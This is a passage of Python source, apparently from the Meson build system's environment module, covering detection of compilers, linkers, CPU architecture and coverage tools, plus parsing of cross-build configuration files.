'mips', 'mips64', 'parisc', 'ppc', 'ppc64', 'riscv32', 'riscv64', 'rx', 's390x', 'sparc', 'sparc64', 'x86', 'x86_64' ) def detect_gcovr(version='3.1', log=False): gcovr_exe = 'gcovr' try: p, found = Popen_safe([gcovr_exe, '--version'])[0:2] except (FileNotFoundError, PermissionError): # Doesn't exist in PATH or isn't executable return None, None found = search_version(found) if p.returncode == 0: if log: mlog.log('Found gcovr-{} at {}'.format(found, shlex.quote(shutil.which(gcovr_exe)))) return gcovr_exe, mesonlib.version_compare(found, '>=' + version) return None, None def find_coverage_tools(): gcovr_exe, gcovr_new_rootdir = detect_gcovr() lcov_exe = 'lcov' genhtml_exe = 'genhtml' if not mesonlib.exe_exists([lcov_exe, '--version']): lcov_exe = None if not mesonlib.exe_exists([genhtml_exe, '--version']): genhtml_exe = None return gcovr_exe, gcovr_new_rootdir, lcov_exe, genhtml_exe def detect_ninja(version='1.5', log=False): for n in ['ninja', 'ninja-build', 'samu']: try: p, found = Popen_safe([n, '--version'])[0:2] except (FileNotFoundError, PermissionError): # Doesn't exist in PATH or isn't executable continue found = found.strip() # Perhaps we should add a way for the caller to know the failure mode # (not found or too old) if p.returncode == 0 and mesonlib.version_compare(found, '>=' + version): if log: mlog.log('Found ninja-{} at {}'.format(found, shlex.quote(shutil.which(n)))) return n def detect_native_windows_arch(): """ The architecture of Windows itself: x86 or amd64 """ # These env variables are always available. See: # https://msdn.microsoft.com/en-us/library/aa384274(VS.85).aspx # https://blogs.msdn.microsoft.com/david.wang/2006/03/27/howto-detect-process-bitness/ arch = os.environ.get('PROCESSOR_ARCHITEW6432', '').lower() if not arch: try: # If this doesn't exist, something is messing with the environment arch = os.environ['PROCESSOR_ARCHITECTURE'].lower() except KeyError: raise EnvironmentException('Unable to detect native OS architecture') return arch def detect_windows_arch(compilers): """ Detecting the 'native' architecture of Windows is not a trivial task. We cannot trust that the architecture that Python is built for is the 'native' one because you can run 32-bit apps on 64-bit Windows using WOW64 and people sometimes install 32-bit Python on 64-bit Windows. We also can't rely on the architecture of the OS itself, since it's perfectly normal to compile and run 32-bit applications on Windows as if they were native applications. It's a terrible experience to require the user to supply a cross-info file to compile 32-bit applications on 64-bit Windows. Thankfully, the only way to compile things with Visual Studio on Windows is by entering the 'msvc toolchain' environment, which can be easily detected. In the end, the sanest method is as follows: 1. Check if we're in an MSVC toolchain environment, and if so, return the MSVC toolchain architecture as our 'native' architecture. 2. If not, check environment variables that are set by Windows and WOW64 to find out the architecture that Windows is built for, and use that as our 'native' architecture. """ os_arch = detect_native_windows_arch() if os_arch != 'amd64': return os_arch # If we're on 64-bit Windows, 32-bit apps can be compiled without # cross-compilation. So if we're doing that, just set the native arch as # 32-bit and pretend like we're running under WOW64. Else, return the # actual Windows architecture that we deduced above. for compiler in compilers.values(): # Check if we're using and inside an MSVC toolchain environment if compiler.id == 'msvc' and 'VCINSTALLDIR' in os.environ: if float(compiler.get_toolset_version()) < 10.0: # On MSVC 2008 and earlier, check 'BUILD_PLAT', where # 'Win32' means 'x86' platform = os.environ.get('BUILD_PLAT', 'x86') if platform == 'Win32': return 'x86' else: # On MSVC 2010 and later 'Platform' is only set when the # target arch is not 'x86'. It's 'x64' when targeting # x86_64 and 'arm' when targeting ARM. platform = os.environ.get('Platform', 'x86').lower() if platform == 'x86': return platform if compiler.id == 'clang-cl' and not compiler.is_64: return 'x86' if compiler.id == 'gcc' and compiler.has_builtin_define('__i386__'): return 'x86' return os_arch def detect_cpu_family(compilers): """ Python is inconsistent in its platform module. It returns different values for the same cpu. For x86 it might return 'x86', 'i686' or somesuch. Do some canonicalization. """ if mesonlib.is_windows(): trial = detect_windows_arch(compilers) else: trial = platform.machine().lower() if trial.startswith('i') and trial.endswith('86'): return 'x86' if trial.startswith('arm'): return 'arm' if trial.startswith('ppc64'): return 'ppc64' if trial == 'powerpc': # FreeBSD calls both ppc and ppc64 "powerpc". # https://github.com/mesonbuild/meson/issues/4397 try: p, stdo, _ = Popen_safe(['uname', '-p']) except (FileNotFoundError, PermissionError): # Not much to go on here. if sys.maxsize > 2**32: return 'ppc64' return 'ppc' if 'powerpc64' in stdo: return 'ppc64' return 'ppc' if trial in ('amd64', 'x64'): trial = 'x86_64' if trial == 'x86_64': # On Linux (and maybe others) there can be any mixture of 32/64 bit # code in the kernel, Python, system etc. The only reliable way # to know is to check the compiler defines. for c in compilers.values(): try: if c.has_builtin_define('__i386__'): return 'x86' except mesonlib.MesonException: # Ignore compilers that do not support has_builtin_define. pass return 'x86_64' # Add fixes here as bugs are reported. if trial not in known_cpu_families: mlog.warning('Unknown CPU family {!r}, please report this at ' 'https://github.com/mesonbuild/meson/issues/new with the' 'output of `uname -a` and `cat /proc/cpuinfo`'.format(trial)) return trial def detect_cpu(compilers): if mesonlib.is_windows(): trial = detect_windows_arch(compilers) else: trial = platform.machine().lower() if trial in ('amd64', 'x64'): trial = 'x86_64' if trial == 'x86_64': # Same check as above for cpu_family for c in compilers.values(): try: if c.has_builtin_define('__i386__'): return 'i686' # All 64 bit cpus have at least this level of x86 support. except mesonlib.MesonException: pass return 'x86_64' if trial == 'e2k': # Make more precise CPU detection for Elbrus platform. trial = platform.processor().lower() # Add fixes here as bugs are reported. return trial def detect_system(): system = platform.system().lower() if system.startswith('cygwin'): return 'cygwin' return system def detect_msys2_arch(): if 'MSYSTEM_CARCH' in os.environ: return os.environ['MSYSTEM_CARCH'] return None def search_version(text): # Usually of the type 4.1.4 but compiler output may contain # stuff like this: # (Sourcery CodeBench Lite 2014.05-29) 4.8.3 20140320 (prerelease) # Limiting major version number to two digits seems to work # thus far. When we get to GCC 100, this will break, but # if we are still relevant when that happens, it can be # considered an achievement in itself. # # This regex is reaching magic levels. If it ever needs # to be updated, do not complexify but convert to something # saner instead. version_regex = '(?<!(\d|\.))(\d{1,2}(\.\d+)+(-[a-zA-Z0-9]+)?)' match = re.search(version_regex, text) if match: return match.group(0) return 'unknown version' class Environment: private_dir = 'meson-private' log_dir = 'meson-logs' def __init__(self, source_dir, build_dir, options): self.source_dir = source_dir self.build_dir = build_dir self.scratch_dir = os.path.join(build_dir, Environment.private_dir) self.log_dir = os.path.join(build_dir, Environment.log_dir) os.makedirs(self.scratch_dir, exist_ok=True) os.makedirs(self.log_dir, exist_ok=True) try: self.coredata = coredata.load(self.get_build_dir()) self.first_invocation = False except FileNotFoundError: self.create_new_coredata(options) except MesonException as e: # If we stored previous command line options, we can recover from # a broken/outdated coredata. if os.path.isfile(coredata.get_cmd_line_file(self.build_dir)): mlog.warning('Regenerating configuration from scratch.') mlog.log('Reason:', mlog.red(str(e))) coredata.read_cmd_line_file(self.build_dir, options) self.create_new_coredata(options) else: raise e self.exe_wrapper = None self.machines = MachineInfos() # Will be fully initialized later using compilers later. self.machines.detect_build() if self.coredata.cross_file: self.cross_info = CrossBuildInfo(self.coredata.cross_file) if 'exe_wrapper' in self.cross_info.config['binaries']: from .dependencies import ExternalProgram self.exe_wrapper = ExternalProgram.from_cross_info(self.cross_info, 'exe_wrapper') if 'host_machine' in self.cross_info.config: self.machines.host = MachineInfo.from_literal( self.cross_info.config['host_machine']) if 'target_machine' in self.cross_info.config: self.machines.target = MachineInfo.from_literal( self.cross_info.config['target_machine']) else: self.cross_info = None self.machines.default_missing() self.cmd_line_options = options.cmd_line_options.copy() # List of potential compilers. if mesonlib.is_windows(): self.default_c = ['cl', 'cc', 'gcc', 'clang', 'clang-cl'] self.default_cpp = ['cl', 'c++', 'g++', 'clang++', 'clang-cl'] else: self.default_c = ['cc', 'gcc', 'clang'] self.default_cpp = ['c++', 'g++', 'clang++'] if mesonlib.is_windows(): self.default_cs = ['csc', 'mcs'] else: self.default_cs = ['mcs', 'csc'] self.default_objc = ['cc'] self.default_objcpp = ['c++'] self.default_fortran = ['gfortran', 'g95', 'f95', 'f90', 'f77', 'ifort'] self.default_rust = ['rustc'] self.default_static_linker = ['ar'] self.vs_static_linker = ['lib'] self.clang_cl_static_linker = ['llvm-lib'] self.gcc_static_linker = ['gcc-ar'] self.clang_static_linker = ['llvm-ar'] # Various prefixes and suffixes for import libraries, shared libraries, # static libraries, and executables. # Versioning is added to these names in the backends as-needed. cross = self.is_cross_build() if mesonlib.for_windows(cross, self): self.exe_suffix = 'exe' self.object_suffix = 'obj' self.win_libdir_layout = True elif mesonlib.for_cygwin(cross, self): self.exe_suffix = 'exe' self.object_suffix = 'o' self.win_libdir_layout = True else: self.exe_suffix = '' self.object_suffix = 'o' self.win_libdir_layout = False if 'STRIP' in os.environ: self.native_strip_bin = shlex.split( os.environ[BinaryTable.evarMap['strip']]) else: self.native_strip_bin = ['strip'] def create_new_coredata(self, options): # WARNING: Don't use any values from coredata in __init__. It gets # re-initialized with project options by the interpreter during # build file parsing. self.coredata = coredata.CoreData(options) # Used by the regenchecker script, which runs meson self.coredata.meson_command = mesonlib.meson_command self.first_invocation = True def is_cross_build(self): return self.cross_info is not None def dump_coredata(self): return coredata.save(self.coredata, self.get_build_dir()) def get_script_dir(self): import mesonbuild.scripts return os.path.dirname(mesonbuild.scripts.__file__) def get_log_dir(self): return self.log_dir def get_coredata(self): return self.coredata def get_build_command(self, unbuffered=False): cmd = mesonlib.meson_command[:] if unbuffered and 'python' in os.path.basename(cmd[0]): cmd.insert(1, '-u') return cmd def is_header(self, fname): return is_header(fname) def is_source(self, fname): return is_source(fname) def is_assembly(self, fname): return is_assembly(fname) def is_llvm_ir(self, fname): return is_llvm_ir(fname) def is_object(self, fname): return is_object(fname) def is_library(self, fname): return is_library(fname) @staticmethod def get_gnu_compiler_defines(compiler): """ Detect GNU compiler platform type (Apple, MinGW, Unix) """ # Arguments to output compiler pre-processor defines to stdout # gcc, g++, and gfortran all support these arguments args = compiler + ['-E', '-dM', '-'] p, output, error = Popen_safe(args, write='', stdin=subprocess.PIPE) if p.returncode != 0: raise EnvironmentException('Unable to detect GNU compiler type:\n' + output + error) # Parse several lines of the type: # `#define ___SOME_DEF some_value` # and extract `___SOME_DEF` defines = {} for line in output.split('\n'): if not line: continue d, *rest = line.split(' ', 2) if d != '#define': continue if len(rest) == 1: defines[rest] = True if len(rest) == 2: defines[rest[0]] = rest[1] return defines @staticmethod def get_gnu_version_from_defines(defines): dot = '.' major = defines.get('__GNUC__', '0') minor = defines.get('__GNUC_MINOR__', '0') patch = defines.get('__GNUC_PATCHLEVEL__', '0') return dot.join((major, minor, patch)) @staticmethod def get_lcc_version_from_defines(defines): dot = '.' generation_and_major = defines.get('__LCC__', '100') generation = generation_and_major[:1] major = generation_and_major[1:] minor = defines.get('__LCC_MINOR__', '0') return dot.join((generation, major, minor)) @staticmethod def get_gnu_compiler_type(defines): # Detect GCC type (Apple, MinGW, Cygwin, Unix) if '__APPLE__' in defines: return CompilerType.GCC_OSX elif '__MINGW32__' in defines or '__MINGW64__' in defines: return CompilerType.GCC_MINGW elif '__CYGWIN__' in defines: return CompilerType.GCC_CYGWIN return CompilerType.GCC_STANDARD def _get_compilers(self, lang, want_cross): ''' The list of compilers is detected in the exact same way for C, C++, ObjC, ObjC++, Fortran, CS so consolidate it here. ''' evar = BinaryTable.evarMap[lang] if self.is_cross_build() and want_cross: if lang not in self.cross_info.config['binaries']: raise EnvironmentException('{!r} compiler binary not defined in cross file'.format(lang)) compilers, ccache = BinaryTable.parse_entry( mesonlib.stringlistify(self.cross_info.config['binaries'][lang])) BinaryTable.warn_about_lang_pointing_to_cross(compilers[0], evar) # Return value has to be a list of compiler 'choices' compilers = [compilers] is_cross = True exe_wrap = self.get_exe_wrapper() elif evar in os.environ: compilers, ccache = BinaryTable.parse_entry( shlex.split(os.environ[evar])) # Return value has to be a list of compiler 'choices' compilers = [compilers] is_cross = False exe_wrap = None else: compilers = getattr(self, 'default_' + lang) ccache = BinaryTable.detect_ccache() is_cross = False exe_wrap = None return compilers, ccache, is_cross, exe_wrap def _handle_exceptions(self, exceptions, binaries, bintype='compiler'): errmsg = 'Unknown {}(s): {}'.format(bintype, binaries) if exceptions: errmsg += '\nThe follow exceptions were encountered:' for (c, e) in exceptions.items(): errmsg += '\nRunning "{0}" gave "{1}"'.format(c, e) raise EnvironmentException(errmsg) def _detect_c_or_cpp_compiler(self, lang, want_cross): popen_exceptions = {} compilers, ccache, is_cross, exe_wrap = self._get_compilers(lang, want_cross) for compiler in compilers: if isinstance(compiler, str): compiler = [compiler] if not set(['cl', 'cl.exe', 'clang-cl', 'clang-cl.exe']).isdisjoint(compiler): # Watcom C provides it's own cl.exe clone that mimics an older # version of Microsoft's compiler. Since Watcom's cl.exe is # just a wrapper, we skip using it if we detect its presence # so as not to confuse Meson when configuring for MSVC. # # Additionally the help text of Watcom's cl.exe is paged, and # the binary will not exit without human intervention. In # practice, Meson will block waiting for Watcom's cl.exe to # exit, which requires user input and thus will never exit. if 'WATCOM' in os.environ: def sanitize(p): return os.path.normcase(os.path.abspath(p)) watcom_cls = [sanitize(os.path.join(os.environ['WATCOM'], 'BINNT', 'cl')), sanitize(os.path.join(os.environ['WATCOM'], 'BINNT', 'cl.exe'))] found_cl = sanitize(shutil.which('cl')) if found_cl in watcom_cls: continue arg = '/?' elif 'armcc' in compiler[0]: arg = '--vsn' elif 'ccrx' in compiler[0]: arg = '-v' else: arg = '--version' try: p, out, err = Popen_safe(compiler + [arg]) except OSError as e: popen_exceptions[' '.join(compiler + [arg])] = e continue if 'ccrx' in compiler[0]: out = err full_version = out.split('\n', 1)[0] version = search_version(out) guess_gcc_or_lcc = False if 'Free Software Foundation' in out: guess_gcc_or_lcc = 'gcc' if 'e2k' in out and 'lcc' in out: guess_gcc_or_lcc = 'lcc' if guess_gcc_or_lcc: defines = self.get_gnu_compiler_defines(compiler) if not defines: popen_exceptions[' '.join(compiler)] = 'no pre-processor defines' continue compiler_type = self.get_gnu_compiler_type(defines) if guess_gcc_or_lcc == 'lcc': version = self.get_lcc_version_from_defines(defines) cls = ElbrusCCompiler if lang == 'c' else ElbrusCPPCompiler else: version = self.get_gnu_version_from_defines(defines) cls = GnuCCompiler if lang == 'c' else GnuCPPCompiler return cls(ccache + compiler, version, compiler_type, is_cross, exe_wrap, defines, full_version=full_version) if 'armclang' in out: # The compiler version is not present in the first line of output, # instead it is present in second line, startswith 'Component:'. # So, searching for the 'Component' in out although we know it is # present in second line, as we are not sure about the # output format in future versions arm_ver_str = re.search('.*Component.*', out) if arm_ver_str is None: popen_exceptions[' '.join(compiler)] = 'version string not found' continue arm_ver_str = arm_ver_str.group(0) # Override previous values version = search_version(arm_ver_str) full_version = arm_ver_str compiler_type = CompilerType.ARM_WIN cls = ArmclangCCompiler if lang == 'c' else ArmclangCPPCompiler return cls(ccache + compiler, version, compiler_type, is_cross, exe_wrap, full_version=full_version) if 'CL.EXE COMPATIBILITY' in out: # if this is clang-cl masquerading as cl, detect it as cl, not # clang arg = '--version' try: p, out, err = Popen_safe(compiler + [arg]) except OSError as e: popen_exceptions[' '.join(compiler + [arg])] = e version = search_version(out) is_64 = 'Target: x86_64' in out cls = ClangClCCompiler if lang == 'c' else ClangClCPPCompiler return cls(compiler, version, is_cross, exe_wrap, is_64) if 'clang' in out: if 'Apple' in out or mesonlib.for_darwin(want_cross, self): compiler_type = CompilerType.CLANG_OSX elif 'windows' in out or mesonlib.for_windows(want_cross, self): compiler_type = CompilerType.CLANG_MINGW else: compiler_type = CompilerType.CLANG_STANDARD cls = ClangCCompiler if lang == 'c' else ClangCPPCompiler return cls(ccache + compiler, version, compiler_type, is_cross, exe_wrap, full_version=full_version) if 'Microsoft' in out or 'Microsoft' in err: # Latest versions of Visual Studio print version # number to stderr but earlier ones print version # on stdout. Why? Lord only knows. # Check both outputs to figure out version. version = search_version(err) if version == 'unknown version': version = search_version(out) if version == 'unknown version': m = 'Failed to detect MSVC compiler arch: stderr was\n{!r}' raise EnvironmentException(m.format(err)) is_64 = err.split('\n')[0].endswith(' x64') cls = VisualStudioCCompiler if lang == 'c' else VisualStudioCPPCompiler return cls(compiler, version, is_cross, exe_wrap, is_64) if '(ICC)' in out: if mesonlib.for_darwin(want_cross, self): compiler_type = CompilerType.ICC_OSX elif mesonlib.for_windows(want_cross, self): # TODO: fix ICC on Windows compiler_type = CompilerType.ICC_WIN else: compiler_type = CompilerType.ICC_STANDARD cls = IntelCCompiler if lang == 'c' else IntelCPPCompiler return cls(ccache + compiler, version, compiler_type, is_cross, exe_wrap, full_version=full_version) if 'ARM' in out: compiler_type = CompilerType.ARM_WIN cls = ArmCCompiler if lang == 'c' else ArmCPPCompiler return cls(ccache + compiler, version, compiler_type, is_cross, exe_wrap, full_version=full_version) if 'RX Family' in out: compiler_type = CompilerType.CCRX_WIN cls = CcrxCCompiler if lang == 'c' else CcrxCPPCompiler return cls(ccache + compiler, version, compiler_type, is_cross, exe_wrap, full_version=full_version) self._handle_exceptions(popen_exceptions, compilers) def detect_c_compiler(self, want_cross): return self._detect_c_or_cpp_compiler('c', want_cross) def detect_cpp_compiler(self, want_cross): return self._detect_c_or_cpp_compiler('cpp', want_cross) def detect_fortran_compiler(self, want_cross): popen_exceptions = {} compilers, ccache, is_cross, exe_wrap = self._get_compilers('fortran', want_cross) for compiler in compilers: if isinstance(compiler, str): compiler = [compiler] for arg in ['--version', '-V']: try: p, out, err = Popen_safe(compiler + [arg]) except OSError as e: popen_exceptions[' '.join(compiler + [arg])] = e continue version = search_version(out) full_version = out.split('\n', 1)[0] guess_gcc_or_lcc = False if 'GNU Fortran' in out: guess_gcc_or_lcc = 'gcc' if 'e2k' in out and 'lcc' in out: guess_gcc_or_lcc = 'lcc' if guess_gcc_or_lcc: defines = self.get_gnu_compiler_defines(compiler) if not defines: popen_exceptions[' '.join(compiler)] = 'no pre-processor defines' continue compiler_type = self.get_gnu_compiler_type(defines) if guess_gcc_or_lcc == 'lcc': version = self.get_lcc_version_from_defines(defines) cls = ElbrusFortranCompiler else: version = self.get_gnu_version_from_defines(defines) cls = GnuFortranCompiler return cls(compiler, version, compiler_type, is_cross, exe_wrap, defines, full_version=full_version) if 'G95' in out: return G95FortranCompiler(compiler, version, is_cross, exe_wrap, full_version=full_version) if 'Sun Fortran' in err: version = search_version(err) return SunFortranCompiler(compiler, version, is_cross, exe_wrap, full_version=full_version) if 'ifort (IFORT)' in out: return IntelFortranCompiler(compiler, version, is_cross, exe_wrap, full_version=full_version) if 'PathScale EKOPath(tm)' in err: return PathScaleFortranCompiler(compiler, version, is_cross, exe_wrap, full_version=full_version) if 'PGI Compilers' in out: return PGIFortranCompiler(compiler, version, is_cross, exe_wrap, full_version=full_version) if 'Open64 Compiler Suite' in err: return Open64FortranCompiler(compiler, version, is_cross, exe_wrap, full_version=full_version) if 'NAG Fortran' in err: return NAGFortranCompiler(compiler, version, is_cross, exe_wrap, full_version=full_version) self._handle_exceptions(popen_exceptions, compilers) def get_scratch_dir(self): return self.scratch_dir def detect_objc_compiler(self, want_cross): popen_exceptions = {} compilers, ccache, is_cross, exe_wrap = self._get_compilers('objc', want_cross) for compiler in compilers: if isinstance(compiler, str): compiler = [compiler] arg = ['--version'] try: p, out, err = Popen_safe(compiler + arg) except OSError as e: popen_exceptions[' '.join(compiler + arg)] = e continue version = search_version(out) if 'Free Software Foundation' in out or ('e2k' in out and 'lcc' in out): defines = self.get_gnu_compiler_defines(compiler) if not defines: popen_exceptions[' '.join(compiler)] = 'no pre-processor defines' continue compiler_type = self.get_gnu_compiler_type(defines) version = self.get_gnu_version_from_defines(defines) return GnuObjCCompiler(ccache + compiler, version, compiler_type, is_cross, exe_wrap, defines) if out.startswith('Apple LLVM'): return ClangObjCCompiler(ccache + compiler, version, CompilerType.CLANG_OSX, is_cross, exe_wrap) if out.startswith('clang'): return ClangObjCCompiler(ccache + compiler, version, CompilerType.CLANG_STANDARD, is_cross, exe_wrap) self._handle_exceptions(popen_exceptions, compilers) def detect_objcpp_compiler(self, want_cross): popen_exceptions = {} compilers, ccache, is_cross, exe_wrap = self._get_compilers('objcpp', want_cross) for compiler in compilers: if isinstance(compiler, str): compiler = [compiler] arg = ['--version'] try: p, out, err = Popen_safe(compiler + arg) except OSError as e: popen_exceptions[' '.join(compiler + arg)] = e continue version = search_version(out) if 'Free Software Foundation' in out or ('e2k' in out and 'lcc' in out): defines = self.get_gnu_compiler_defines(compiler) if not defines: popen_exceptions[' '.join(compiler)] = 'no pre-processor defines' continue compiler_type = self.get_gnu_compiler_type(defines) version = self.get_gnu_version_from_defines(defines) return GnuObjCPPCompiler(ccache + compiler, version, compiler_type, is_cross, exe_wrap, defines) if out.startswith('Apple LLVM'): return ClangObjCPPCompiler(ccache + compiler, version, CompilerType.CLANG_OSX, is_cross, exe_wrap) if out.startswith('clang'): return ClangObjCPPCompiler(ccache + compiler, version, CompilerType.CLANG_STANDARD, is_cross, exe_wrap) self._handle_exceptions(popen_exceptions, compilers) def detect_java_compiler(self): exelist = ['javac'] try: p, out, err = Popen_safe(exelist + ['-version']) except OSError: raise EnvironmentException('Could not execute Java compiler "%s"' % ' '.join(exelist)) if 'javac' in out or 'javac' in err: version = search_version(err if 'javac' in err else out) return JavaCompiler(exelist, version) raise EnvironmentException('Unknown compiler "' + ' '.join(exelist) + '"') def detect_cs_compiler(self): compilers, ccache, is_cross, exe_wrap = self._get_compilers('cs', False) popen_exceptions = {} for comp in compilers: if not isinstance(comp, list): comp = [comp] try: p, out, err = Popen_safe(comp + ['--version']) except OSError as e: popen_exceptions[' '.join(comp + ['--version'])] = e continue version = search_version(out) if 'Mono' in out: return MonoCompiler(comp, version) elif "Visual C#" in out: return VisualStudioCsCompiler(comp, version) self._handle_exceptions(popen_exceptions, compilers) def detect_vala_compiler(self): if 'VALAC' in os.environ: exelist = shlex.split(os.environ['VALAC']) else: exelist = ['valac'] try: p, out = Popen_safe(exelist + ['--version'])[0:2] except OSError: raise EnvironmentException('Could not execute Vala compiler "%s"' % ' '.join(exelist)) version = search_version(out) if 'Vala' in out: return ValaCompiler(exelist, version) raise EnvironmentException('Unknown compiler "' + ' '.join(exelist) + '"') def detect_rust_compiler(self, want_cross): popen_exceptions = {} compilers, ccache, is_cross, exe_wrap = self._get_compilers('rust', want_cross) for compiler in compilers: if isinstance(compiler, str): compiler = [compiler] arg = ['--version'] try: p, out = Popen_safe(compiler + arg)[0:2] except OSError as e: popen_exceptions[' '.join(compiler + arg)] = e continue version = search_version(out) if 'rustc' in out: return RustCompiler(compiler, version, is_cross, exe_wrap) self._handle_exceptions(popen_exceptions, compilers) def detect_d_compiler(self, want_cross): is_cross = False # Search for a D compiler. # We prefer LDC over GDC unless overridden with the DC # environment variable because LDC has a much more # up to date language version at time (2016). if 'DC' in os.environ: exelist = shlex.split(os.environ['DC']) if os.path.basename(exelist[-1]).startswith(('ldmd', 'gdmd')): raise EnvironmentException('Meson doesn\'t support %s as it\'s only a DMD frontend for another compiler. Please provide a valid value for DC or unset it so that Meson can resolve the compiler by itself.' % exelist[-1]) elif self.is_cross_build() and want_cross: exelist = mesonlib.stringlistify(self.cross_info.config['binaries']['d']) is_cross = True elif shutil.which("ldc2"): exelist = ['ldc2'] elif shutil.which("ldc"): exelist = ['ldc'] elif shutil.which("gdc"): exelist = ['gdc'] elif shutil.which("dmd"): exelist = ['dmd'] else: raise EnvironmentException('Could not find any supported D compiler.') try: p, out = Popen_safe(exelist + ['--version'])[0:2] except OSError: raise EnvironmentException('Could not execute D compiler "%s"' % ' '.join(exelist)) version = search_version(out) full_version = out.split('\n', 1)[0] # Detect the target architecture, required for proper architecture handling on Windows. c_compiler = {} is_msvc = mesonlib.is_windows() and 'VCINSTALLDIR' in os.environ if is_msvc: c_compiler = {'c': self.detect_c_compiler(want_cross)} # MSVC compiler is required for correct platform detection. arch = detect_cpu_family(c_compiler) if is_msvc and arch == 'x86': arch = 'x86_mscoff' if 'LLVM D compiler' in out: return compilers.LLVMDCompiler(exelist, version, is_cross, arch, full_version=full_version) elif 'gdc' in out: return compilers.GnuDCompiler(exelist, version, is_cross, arch, full_version=full_version) elif 'The D Language Foundation' in out or 'Digital Mars' in out: return compilers.DmdDCompiler(exelist, version, is_cross, arch, full_version=full_version) raise EnvironmentException('Unknown compiler "' + ' '.join(exelist) + '"') def detect_swift_compiler(self): exelist = ['swiftc'] try: p, _, err = Popen_safe(exelist + ['-v']) except OSError: raise EnvironmentException('Could not execute Swift compiler "%s"' % ' '.join(exelist)) version = search_version(err) if 'Swift' in err: return compilers.SwiftCompiler(exelist, version) raise EnvironmentException('Unknown compiler "' + ' '.join(exelist) + '"') def detect_static_linker(self, compiler): if compiler.is_cross: linker = self.cross_info.config['binaries']['ar'] if isinstance(linker, str): linker = [linker] linkers = [linker] else: evar = BinaryTable.evarMap['ar'] if evar in os.environ: linkers = [shlex.split(os.environ[evar])] elif isinstance(compiler, compilers.VisualStudioCCompiler): linkers = [self.vs_static_linker, self.clang_cl_static_linker] elif isinstance(compiler, compilers.GnuCompiler): # Use gcc-ar if available; needed for LTO linkers = [self.gcc_static_linker, self.default_static_linker] elif isinstance(compiler, compilers.ClangCompiler): # Use llvm-ar if available; needed for LTO linkers = [self.clang_static_linker, self.default_static_linker] elif isinstance(compiler, compilers.DCompiler): # Prefer static linkers over linkers used by D compilers if mesonlib.is_windows(): linkers = [self.vs_static_linker, self.clang_cl_static_linker, compiler.get_linker_exelist()] else: linkers = [self.default_static_linker, compiler.get_linker_exelist()] else: linkers = [self.default_static_linker] popen_exceptions = {} for linker in linkers: if not set(['lib', 'lib.exe', 'llvm-lib', 'llvm-lib.exe']).isdisjoint(linker): arg = '/?' else: arg = '--version' try: p, out, err = Popen_safe(linker + [arg]) except OSError as e: popen_exceptions[' '.join(linker + [arg])] = e continue if '/OUT:' in out.upper() or '/OUT:' in err.upper(): return VisualStudioLinker(linker) if p.returncode == 0 and ('armar' in linker or 'armar.exe' in linker): return ArmarLinker(linker) if 'DMD32 D Compiler' in out or 'DMD64 D Compiler' in out: return DLinker(linker, compiler.arch) if 'LDC - the LLVM D compiler' in out: return DLinker(linker, compiler.arch) if 'GDC' in out and ' based on D ' in out: return DLinker(linker, compiler.arch) if err.startswith('Renesas') and ('rlink' in linker or 'rlink.exe' in linker): return CcrxLinker(linker) if p.returncode == 0: return ArLinker(linker) if p.returncode == 1 and err.startswith('usage'): # OSX return ArLinker(linker) if p.returncode == 1 and err.startswith('Usage'): # AIX return ArLinker(linker) self._handle_exceptions(popen_exceptions, linkers, 'linker') raise EnvironmentException('Unknown static linker "%s"' % ' '.join(linkers)) def get_source_dir(self): return self.source_dir def get_build_dir(self): return self.build_dir def get_exe_suffix(self): return self.exe_suffix def get_import_lib_dir(self): "Install dir for the import library (library used for linking)" return self.get_libdir() def get_shared_module_dir(self): "Install dir for shared modules that are loaded at runtime" return self.get_libdir() def get_shared_lib_dir(self): "Install dir for the shared library" if self.win_libdir_layout: return self.get_bindir() return self.get_libdir() def get_static_lib_dir(self): "Install dir for the static library" return self.get_libdir() def get_object_suffix(self): return self.object_suffix def get_prefix(self): return self.coredata.get_builtin_option('prefix') def get_libdir(self): return self.coredata.get_builtin_option('libdir') def get_libexecdir(self): return self.coredata.get_builtin_option('libexecdir') def get_bindir(self): return self.coredata.get_builtin_option('bindir') def get_includedir(self): return self.coredata.get_builtin_option('includedir') def get_mandir(self): return self.coredata.get_builtin_option('mandir') def get_datadir(self): return self.coredata.get_builtin_option('datadir') def get_compiler_system_dirs(self): for comp in self.coredata.compilers.values(): if isinstance(comp, compilers.ClangCompiler): index = 1 break elif isinstance(comp, compilers.GnuCompiler): index = 2 break else: # This option is only supported by gcc and clang. If we don't get a # GCC or Clang compiler return and empty list. return [] p, out, _ = Popen_safe(comp.get_exelist() + ['-print-search-dirs']) if p.returncode != 0: raise mesonlib.MesonException('Could not calculate system search dirs') out = out.split('\n')[index].lstrip('libraries: =').split(':') return [os.path.normpath(p) for p in out] def get_exe_wrapper(self): if not self.cross_info.need_exe_wrapper(): from .dependencies import EmptyExternalProgram return EmptyExternalProgram() return self.exe_wrapper class CrossBuildInfo: def __init__(self, filename): self.config = {'properties': {}} self.parse_datafile(filename) if 'host_machine' not in self.config and 'target_machine' not in self.config: raise mesonlib.MesonException('Cross info file must have either host or a target machine.') if 'host_machine' in self.config and 'binaries' not in self.config: raise mesonlib.MesonException('Cross file with "host_machine" is missing "binaries".') def ok_type(self, i): return isinstance(i, (str, int, bool)) def parse_datafile(self, filename): config = configparser.ConfigParser() try: with open(filename, 'r') as f: config.read_file(f, filename) except FileNotFoundError: raise EnvironmentException('File not found: %s.' % filename) # This is a bit hackish at the moment. for s in config.sections(): self.config[s] = {} for entry in config[s]: value = config[s][entry] if ' ' in entry or '\t' in entry or "'" in entry or '"' in entry: raise EnvironmentException('Malformed variable name %s in cross file..' % entry) try: res = eval(value, {'__builtins__': None}, {'true': True, 'false': False}) except Exception: raise EnvironmentException('Malformed value in cross file variable %s.' % entry) if self.ok_type(res): self.config[s][entry] = res elif isinstance(res, list): for i in res: if not self.ok_type(i): raise EnvironmentException('Malformed value in cross file variable %s.' % entry) self.config[s][entry] = res else: raise EnvironmentException('Malformed value in cross file variable %s.' % entry) def has_host(self): return 'host_machine' in self.config def has_target(self): return 'target_machine' in self.config def has_stdlib(self, language): return language + '_stdlib' in self.config['properties'] def get_stdlib(self, language): return self.config['properties'][language + '_stdlib'] def get_host_system(self): "Name of host system like 'linux', or None" if self.has_host(): return self.config['host_machine']['system'] return None def get_properties(self): return self.config['properties'] def get_root(self): return self.get_properties().get('root', None) def get_sys_root(self): return self.get_properties().get('sys_root', None) # When compiling a cross compiler we use the native compiler for everything. # But not when cross compiling a cross compiler. def need_cross_compiler(self): return 'host_machine' in self.config def need_exe_wrapper(self): value = self.config['properties'].get('needs_exe_wrapper', None) if value is not None: return value # Can almost 